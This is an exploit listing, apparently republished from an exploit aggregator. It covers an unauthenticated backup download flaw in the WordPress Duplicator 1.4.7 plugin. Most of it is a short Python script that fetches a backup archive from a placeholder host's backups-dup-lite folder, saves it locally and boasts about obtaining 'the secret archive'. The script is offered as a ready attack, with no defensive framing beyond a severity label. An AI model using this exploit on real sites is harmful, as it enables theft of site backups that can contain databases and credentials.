Share
## https://sploitus.com/exploit?id=PACKETSTORM:167919
## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download  
## Author: nu11secur1ty  
## Date: 08.03.2022  
## Vendor: https://wordpress.org/  
## Software: https://wordpress.org/plugins/duplicator/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin  
  
  
  
## Description:  
The WordPress Plugin Duplicator 1.4.7 suffers from Unauthenticated  
Backup Download.  
The attacker can download all archive information from the system by  
using this vulnerability!  
Status: CRITICAL  
  
[+] Exploit:  
  
```mysql  
#!/usr/bin/python  
# Author nu11secur1ty  
import requests  
import time  
  
vulnerableURL =  
"http://pwned_host.com/wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip"  
response = requests.get(vulnerableURL)  
open("20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip",  
"wb").write(response.content)  
time.sleep(5)  
print("Right now, you just downloaded the secret archive =)\n")  
  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin)  
  
## Proof and Exploit:  
[href](https://streamable.com/n3osob)